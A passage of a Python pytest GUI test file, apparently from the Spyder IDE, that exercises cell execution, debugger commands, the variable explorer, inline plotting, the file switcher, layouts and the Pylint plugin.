with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.AltModifier | Qt.ShiftModifier)
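# Send '!c' to the debugger so the debugged cell runs to completion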
qtbot.keyClicks(shell._control, '!c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Re-run last cell ----
# Run the first three cells in file
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
# Wait until objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 2,
timeout=EVAL_TIMEOUT)
# Clean namespace
with qtbot.waitSignal(shell.executed):
shell.execute('%reset -f')
# Wait until there are no objects in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0,
timeout=EVAL_TIMEOUT)
# Re-run last cell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.AltModifier)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
assert shell.get_value('li') == [1, 2, 3]
# ---- Closing test file ----
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
@pytest.mark.parametrize('main_window',
[{'spy_config': ('editor', 'run_cell_copy', True)}],
indirect=True)
def test_run_cell_copy(main_window, qtbot, tmpdir):
"""Test all the different ways we have to run code"""
# ---- Setup ----
p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
.join(u"runtest's file èáïü Øαôå 字分误.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Make sure run_cell_copy is properly set
for editorstack in main_window.editor.editorstacks:
editorstack.set_run_cell_copy(True)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# ---- Run cell and advance ----
# Run the cells present in the file
for _ in range(4):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Check for errors and the copied code
assert 'runcell' not in shell._control.toPlainText()
assert 'a = 10' in shell._control.toPlainText()
assert 'Error:' not in shell._control.toPlainText()
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert ']: 10\n' in shell._control.toPlainText()
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
# ---- Closing test file and reset config ----
main_window.editor.close_file()
CONF.set('editor', 'run_cell_copy', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(running_in_ci(), reason="Fails on CIs")
def test_open_files_in_new_editor_window(main_window, qtbot):
"""
This tests that opening files in a new editor window
is working as expected.
Test for spyder-ide/spyder#4085.
"""
# Set a timer to manipulate the open dialog while it's running
QTimer.singleShot(2000, lambda: open_file_in_editor(main_window,
'script.py',
directory=LOCATION))
# Create a new editor window
# Note: editor.load() uses the current editorstack by default
main_window.editor.create_new_window()
main_window.editor.load()
# Perform the test
# Note: There's always one file open in the Editor
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.get_stack_count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
def test_close_when_file_is_changed(main_window, qtbot):
"""Test closing spyder when there is a file with modifications open."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
editorstack = main_window.editor.get_current_editorstack()
editor = editorstack.get_current_editor()
editor.document().setModified(True)
# Wait for the segfault
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_maximize_minimize_plugins(main_window, qtbot):
"""Test that the maximize button is working correctly."""
# Set focus to the Editor
main_window.editor.get_focus_widget().setFocus()
# Click the maximize button
max_action = main_window.layouts.maximize_action
max_button = main_window.main_toolbar.widgetForAction(max_action)
qtbot.mouseClick(max_button, Qt.LeftButton)
# Verify that the Editor is maximized
assert main_window.editor._ismaximized
# Verify that the action minimizes the plugin too
qtbot.mouseClick(max_button, Qt.LeftButton)
assert not main_window.editor._ismaximized
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or running_in_ci() and PYQT_VERSION >= '5.9',
reason="It times out on Windows and segfaults in our CIs with PyQt >= 5.9")
def test_issue_4066(main_window, qtbot):
"""
Test for a segfault when these steps are followed:
1. Open an object present in the Variable Explorer (e.g. a list).
2. Delete that object in its corresponding console while its
editor is still open.
3. Close that editor by pressing its *Ok* button.
"""
# Create the object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('myobj = [1, 2, 3]')
# Open editor associated with that object and get a reference to it
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
obj_editor_id = list(nsb.editor.delegate._editors.keys())[0]
obj_editor = nsb.editor.delegate._editors[obj_editor_id]['editor']
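# Keep a reference to the value editor so it can be closed after the
# object is deleted from the console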
# Move to the IPython console and delete that object
main_window.ipyconsole.get_widget().get_focus_widget().setFocus()
with qtbot.waitSignal(shell.executed):
shell.execute('del myobj')
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
# Close editor
ok_widget = obj_editor.btn_close
qtbot.mouseClick(ok_widget, Qt.LeftButton)
# Wait for the segfault
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_varexp_edit_inline(main_window, qtbot):
"""
Test for errors when editing inline values in the Variable Explorer
and then moving to another plugin.
Note: Errors for this test don't appear related to it but instead they
are shown down the road. That's because they are generated by an
async C++ RuntimeError.
"""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Edit object
main_window.variableexplorer.change_visibility(True)
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
# Change focus to IPython console
main_window.ipyconsole.get_widget().get_focus_widget().setFocus()
# Wait for the error
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out sometimes on Windows and macOS")
def test_c_and_n_pdb_commands(main_window, qtbot):
"""Test that c and n Pdb commands update the Variable Explorer."""
nsb = main_window.variableexplorer.current_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Set a breakpoint
code_editor = main_window.editor.get_focus_widget()
code_editor.debugger.toogle_breakpoint(line_number=6)
qtbot.wait(500)
# Verify that c works
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!c')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 1)
# Verify that n works
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 2)
# Verify that next doesn't go into sitecustomize.py and that it stops
# the debugging session.
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 3)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
# Assert that the prompt appears
shell.clear_console()
assert 'In [2]:' in control.toPlainText()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_stop_dbg(main_window, qtbot):
"""Test that we correctly stop a debugging session."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Move to the next line
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!n")
# Stop debugging
stop_debug_action = main_window.debug_toolbar_actions[5]
stop_debug_button = main_window.debug_toolbar.widgetForAction(stop_debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(stop_debug_button, Qt.LeftButton)
# Assert there are only two ipdb prompts in the console
assert shell._control.toPlainText().count('IPdb') == 2
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It only works on Linux")
def test_change_cwd_dbg(main_window, qtbot):
"""
Test that using the Working directory toolbar is working while debugging.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file to be able to enter in debugging mode
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_widget().get_focus_widget()
control.setFocus()
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Set the system temp dir as cwd
main_window.workingdirectory.chdir(tempfile.gettempdir())
qtbot.wait(1000)
print(repr(control.toPlainText()))
shell.clear_console()
qtbot.wait(500)
# Get cwd in console
qtbot.keyClicks(control, 'import os; os.getcwd()')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Assert cwd is the right one
assert tempfile.gettempdir() in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or PY2, reason="It times out sometimes")
def test_varexp_magic_dbg(main_window, qtbot):
"""Test that %varexp is working while debugging."""
nsb = main_window.variableexplorer.current_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file to be able to enter in debugging mode
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_widget().get_focus_widget()
control.setFocus()
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Get to an object that can be plotted
for _ in range(2):
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
# Generate the plot from the Variable Explorer
nsb.editor.plot('li', 'plot')
qtbot.wait(1000)
# Assert that there's a plot in the console
assert shell._control.toHtml().count('img src') == 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2, reason="It times out sometimes")
@pytest.mark.parametrize(
'main_window',
[{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 1)},
{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 0)}],
indirect=True)
def test_plots_plugin(main_window, qtbot, tmpdir, mocker):
"""
Test that plots generated in the IPython console are properly displayed
in the plots plugin.
"""
assert CONF.get('plots', 'mute_inline_plotting') is False
shell = main_window.ipyconsole.get_current_shellwidget()
figbrowser = main_window.plots.current_widget()
# Wait until the window is fully up.
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Generate a plot inline.
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig = plt.plot([1, 2, 3, 4], '.')\n"))
if CONF.get('ipython_console', 'pylab/inline/figure_format') == 0:
assert figbrowser.figviewer.figcanvas.fmt == 'image/png'
else:
assert figbrowser.figviewer.figcanvas.fmt == 'image/svg+xml'
# Get the image name from the html, fetch the image from the shell, and
# save it as a png.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
ipython_figname = osp.join(to_text_string(tmpdir), 'ipython_img.png')
ipython_qimg = shell._get_image(img_name)
ipython_qimg.save(ipython_figname)
# Save the image with the Plots plugin as a png.
plots_figname = osp.join(to_text_string(tmpdir), 'plots_img.png')
mocker.patch('spyder.plugins.plots.widgets.figurebrowser.getsavefilename',
return_value=(plots_figname, '.png'))
figbrowser.save_figure()
assert compare_images(ipython_figname, plots_figname, 0.1) is None
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
(parse_version(ipy_release.version) >= parse_version('7.23.0') and
parse_version(ipykernel.__version__) <= parse_version('5.5.3')),
reason="Fails due to a bug in the %matplotlib magic")
def test_tight_layout_option_for_inline_plot(main_window, qtbot, tmpdir):
"""
Test that the option to set bbox_inches to 'tight' or 'None' is
working when plotting inline in the IPython console. By default, figures
are plotted inline with bbox_inches='tight'.
"""
tmpdir = to_text_string(tmpdir)
# Assert that the default is True.
assert CONF.get('ipython_console', 'pylab/inline/bbox_inches') is True
fig_dpi = float(CONF.get('ipython_console', 'pylab/inline/resolution'))
fig_width = float(CONF.get('ipython_console', 'pylab/inline/width'))
fig_height = float(CONF.get('ipython_console', 'pylab/inline/height'))
# Wait until the window is fully up.
shell = main_window.ipyconsole.get_current_shellwidget()
client = main_window.ipyconsole.get_current_client()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_widget().get_focus_widget()
control.setFocus()
# Generate a plot inline with bbox_inches=tight (since it is default) and
# save the figure with savefig.
savefig_figname = osp.join(
tmpdir, 'savefig_bbox_inches_tight.png').replace('\\', '/')
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig, ax = plt.subplots()\n"
"fig.set_size_inches(%f, %f)\n"
"ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
"ax.set_xticks(range(10))\n"
"ax.xaxis.set_ticklabels([])\n"
"ax.set_yticks(range(10))\n"
"ax.yaxis.set_ticklabels([])\n"
"ax.tick_params(axis='both', length=0)\n"
"for loc in ax.spines:\n"
" ax.spines[loc].set_color('#000000')\n"
" ax.spines[loc].set_linewidth(2)\n"
"ax.axis([0, 9, 0, 9])\n"
"ax.plot(range(10), color='#000000', lw=2)\n"
"fig.savefig('%s',\n"
" bbox_inches='tight',\n"
" dpi=%f)"
) % (fig_width, fig_height, savefig_figname, fig_dpi))
# Get the image name from the html, fetch the image from the shell, and
# then save it to a file.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
qimg = shell._get_image(img_name)
assert isinstance(qimg, QImage)
# Save the inline figure and assert it is similar to the one generated
# with savefig.
inline_figname = osp.join(tmpdir, 'inline_bbox_inches_tight.png')
qimg.save(inline_figname)
assert compare_images(savefig_figname, inline_figname, 0.1) is None
# Change the option so that bbox_inches=None.
CONF.set('ipython_console', 'pylab/inline/bbox_inches', False)
# Restart the kernel and wait until it's up again
shell._prompt_html = None
client.restart_kernel()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Generate the same plot inline, now with bbox_inches=None, and save the
# figure with savefig.
savefig_figname = osp.join(
tmpdir, 'savefig_bbox_inches_None.png').replace('\\', '/')
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig, ax = plt.subplots()\n"
"fig.set_size_inches(%f, %f)\n"
"ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
"ax.set_xticks(range(10))\n"
"ax.xaxis.set_ticklabels([])\n"
"ax.set_yticks(range(10))\n"
"ax.yaxis.set_ticklabels([])\n"
"ax.tick_params(axis='both', length=0)\n"
"for loc in ax.spines:\n"
" ax.spines[loc].set_color('#000000')\n"
" ax.spines[loc].set_linewidth(2)\n"
"ax.axis([0, 9, 0, 9])\n"
"ax.plot(range(10), color='#000000', lw=2)\n"
"fig.savefig('%s',\n"
" bbox_inches=None,\n"
" dpi=%f)"
) % (fig_width, fig_height, savefig_figname, fig_dpi))
# Get the image name from the html, fetch the image from the shell, and
# then save it to a file.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
qimg = shell._get_image(img_name)
assert isinstance(qimg, QImage)
# Save the inline figure and assert it is similar to the one generated
# with savefig.
inline_figname = osp.join(tmpdir, 'inline_bbox_inches_None.png')
qimg.save(inline_figname)
assert compare_images(savefig_figname, inline_figname, 0.1) is None
# FIXME: Make this test work again in our CIs (it's passing locally)
@pytest.mark.skip
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
def test_switcher(main_window, qtbot, tmpdir):
"""Test the use of shorten paths when necessary in the switcher."""
switcher = main_window.switcher
# Assert that the full path of a file is shown in the switcher
file_a = tmpdir.join('test_file_a.py')
file_a.write('''
def example_def():
pass
def example_def_2():
pass
''')
main_window.editor.load(str(file_a))
main_window.open_switcher()
switcher_paths = [switcher.model.item(item_idx).get_description()
for item_idx in range(switcher.model.rowCount())]
assert osp.dirname(str(file_a)) in switcher_paths or len(str(file_a)) > 75
switcher.close()
# Assert that long paths are shortened in the switcher
dir_b = tmpdir
for _ in range(3):
dir_b = dir_b.mkdir(str(uuid.uuid4()))
file_b = dir_b.join('test_file_b.py')
file_b.write('bar\n')
main_window.editor.load(str(file_b))
main_window.open_switcher()
file_b_text = switcher.model.item(
switcher.model.rowCount() - 1).get_description()
assert '...' in file_b_text
switcher.close()
# Assert search works correctly
search_texts = ['test_file_a', 'file_b', 'foo_spam']
expected_paths = [file_a, file_b, None]
for search_text, expected_path in zip(search_texts, expected_paths):
main_window.open_switcher()
qtbot.keyClicks(switcher.edit, search_text)
qtbot.wait(200)
assert switcher.count() == bool(expected_path)
switcher.close()
# Assert symbol switcher works
main_window.editor.set_current_filename(str(file_a))
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.request_symbols()
qtbot.wait(9000)
main_window.open_switcher()
qtbot.keyClicks(switcher.edit, '@')
qtbot.wait(200)
assert switcher.count() == 2
switcher.close()
@flaky(max_runs=3)
@pytest.mark.slow
def test_edidorstack_open_switcher_dlg(main_window, tmpdir):
"""
Test that the file switcher is working as expected when called from the
editorstack.
Regression test for spyder-ide/spyder#10684
"""
# Add a file to the editor.
file = tmpdir.join('test_file_open_switcher_dlg.py')
file.write("a test file for test_edidorstack_open_switcher_dlg")
main_window.editor.load(str(file))
# Test that the file switcher opens as expected from the editorstack.
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.switcher_dlg is None
editorstack.open_switcher_dlg()
assert editorstack.switcher_dlg
assert editorstack.switcher_dlg.isVisible()
assert (editorstack.switcher_dlg.count() ==
len(main_window.editor.get_filenames()))
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out too much on Windows and macOS")
def test_editorstack_open_symbolfinder_dlg(main_window, qtbot, tmpdir):
"""
Test that the symbol finder is working as expected when called from the
editorstack.
Regression test for spyder-ide/spyder#10684
"""
# Add a file to the editor.
file = tmpdir.join('test_file.py')
file.write('''
def example_def():
pass
def example_def_2():
pass
''')
main_window.editor.load(str(file))
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.request_symbols()
qtbot.wait(5000)
# Test that the symbol finder opens as expected from the editorstack.
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.switcher_dlg is None
editorstack.open_symbolfinder_dlg()
assert editorstack.switcher_dlg
assert editorstack.switcher_dlg.isVisible()
assert editorstack.switcher_dlg.count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
reason="Times out sometimes on macOS")
def test_run_static_code_analysis(main_window, qtbot):
"""This tests that the Pylint plugin is working as expected."""
from spyder.plugins.pylint.main_widget import PylintWidgetActions
# Select the third-party plugin
pylint_plugin = main_window.get_plugin(Plugins.Pylint)
# Do an analysis
test_file = osp.join(LOCATION, 'script_pylint.py')
main_window.editor.load(test_file)
pylint_plugin.get_action(PylintWidgetActions.RunCodeAnalysis).trigger()
qtbot.wait(3000)
# Perform the test
# Check output of the analysis
treewidget = pylint_plugin.get_widget().get_focus_widget()
qtbot.waitUntil(lambda: treewidget.results is not None,
timeout=SHELL_TIMEOUT)
result_content = treewidget.results
assert result_content['C:']
pylint_version = parse_version(pylint.__version__)
if pylint_version < parse_version('2.5.0'):
number_of_conventions = 5
else:
number_of_conventions = 3
assert len(result_content['C:']) == number_of_conventions
# Close the file
main_window.editor.close_file()
@flaky(max_runs=3)
@pytest.mark.slow
def test_troubleshooting_menu_item_and_url(main_window, qtbot, monkeypatch):
"""Test that the troubleshooting menu item calls the valid URL."""
application_plugin = main_window.application
MockQDesktopServices = Mock()
mockQDesktopServices_instance = MockQDesktopServices()
attr_to_patch = ('spyder.utils.qthelpers.QDesktopServices')
monkeypatch.setattr(attr_to_patch, MockQDesktopServices)
# Unit test of help menu item: Make sure the correct URL is called.
application_plugin.trouble_action.trigger()
assert MockQDesktopServices.openUrl.call_count == 1
mockQDesktopServices_instance.openUrl.called_once_with(__trouble_url__)
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows")
def test_help_opens_when_show_tutorial_full(main_window, qtbot):
"""
Test fix for spyder-ide/spyder#6317.
'Show tutorial' opens the help plugin if closed.
"""
HELP_STR = "Help"
help_pane_menuitem = None
for action in main_window.layouts.plugins_menu.get_actions():
if action.text() == HELP_STR:
help_pane_menuitem = action
break
# Test opening tutorial with Help plugin closed
main_window.help.toggle_view_action.setChecked(False)
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert help_tabbar is None and help_index is None
assert not isinstance(main_window.focusWidget(), ObjectComboBox)
assert not help_pane_menuitem.isChecked()
main_window.help.show_tutorial()
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
# Test opening tutorial with help plugin open, but not selected
help_tabbar.setCurrentIndex((help_tabbar.currentIndex() + 1)
% help_tabbar.count())
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index != help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
main_window.help.show_tutorial()
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
# Test opening tutorial with help plugin open and the active tab
qtbot.wait(500)
main_window.help.show_tutorial()
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
qtbot.wait(500)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
@pytest.mark.slow
@flaky(max_runs=3)
def test_report_issue(main_window, qtbot):
"""Test that the report error dialog opens correctly."""
main_window.console.report_issue()
qtbot.wait(300)
assert main_window.console.get_widget()._report_dlg is not None
assert main_window.console.get_widget()._report_dlg.isVisible()
assert main_window.console.get_widget()._report_dlg.close()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
sys.platform.startswith('linux'), reason="It segfaults on Linux")
def test_custom_layouts(main_window, qtbot):
"""Test that layout are showing the expected widgets visible."""
mw = main_window
mw.first_spyder_run = False
prefix = 'window' + '/'
settings = mw.layouts.load_window_settings(prefix=prefix, default=True)
# Test layout changes
for layout_idx in get_class_values(DefaultLayouts):
with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
layout = mw.layouts.setup_default_layouts(
layout_idx, settings=settings)
qtbot.wait(500)
for area in layout._areas:
if area['visible']:
for plugin_id in area['plugin_ids']:
if plugin_id not in area['hidden_plugin_ids']:
plugin = mw.get_plugin(plugin_id)
print(plugin) # spyder: test-skip
try:
# New API
assert plugin.get_widget().isVisible()
except AttributeError:
# Old API
assert plugin.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not running_in_ci() or sys.platform.startswith('linux'),
reason="Only runs in CIs and fails on Linux sometimes")
def test_programmatic_custom_layouts(main_window, qtbot):
"""
Test that a custom layout gets registered and it is recognized."""
mw = main_window
mw.first_spyder_run = False
# Test layout registration
layout_id = 'testing layout'
# Test the testing plugin is being loaded
mw.get_plugin('spyder_boilerplate')
# Get the registered layout
layout = mw.layouts.get_layout(layout_id)
with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
mw.layouts.quick_layout_switch(layout_id)
qtbot.wait(500)
for area in layout._areas:
if area['visible']:
for plugin_id in area['plugin_ids']:
if plugin_id not in area['hidden_plugin_ids']:
plugin = mw.get_plugin(plugin_id)
print(plugin) # spyder: test-skip
try:
# New API
assert plugin.get_widget().isVisible()
except AttributeError:
# Old API
assert plugin.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
def test_save_on_runfile(main_window, qtbot):
"""Test that layout are showing the expected widgets visible."""
# Load test file
test_file = osp.join(LOCATION, 'script.py')
test_file_copy = test_file[:-3] + '_copy.py'
shutil.copyfile(test_file, test_file_copy)
main_window.editor.load(test_file_copy)
code_editor = main_window.editor.get_focus_widget()
# Verify result
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
qtbot.keyClicks(code_editor, 'test_var = 123', delay=100)
filename = code_editor.filename
with qtbot.waitSignal(shell.sig_prompt_ready):
shell.execute('runfile("{}")'.format(remove_backslashes(filename)))
assert shell.get_value('test_var') == 123
main_window.editor.close_file()
os.remove(test_file_copy)
@pytest.mark.slow
@pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS")
def test_pylint_follows_file(qtbot, tmpdir, main_window):
"""Test that file editor focus change updates pylint combobox filename."""
pylint_plugin = main_window.get_plugin(Plugins.Pylint)
# Show pylint plugin
pylint_plugin.dockwidget.show()
pylint_plugin.dockwidget.raise_()
# Create base temporary directory
basedir = tmpdir.mkdir('foo')
# Open some files
for idx in range(2):
fh = basedir.join('{}.py'.format(idx))
fname = str(fh)
fh.write('print("Hello world!")')
main_window.open_file(fh)
qtbot.wait(200)
assert fname == pylint_plugin.get_filename()
# Create an editor split
main_window.editor.editorsplitter.split(orientation=Qt.Vertical)
qtbot.wait(500)
# Open other files
for idx in range(4):
fh = basedir.join('{}.py'.format(idx))
fh.write('print("Hello world!")')
fname = str(fh)
main_window.open_file(fh)
qtbot.wait(200)
assert fname == pylint_plugin.get_filename()
# Close split panel
for editorstack in reversed(main_window.editor.editorstacks):
editorstack.close_split()
break
qtbot.wait(1000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_report_comms_error(qtbot, main_window):
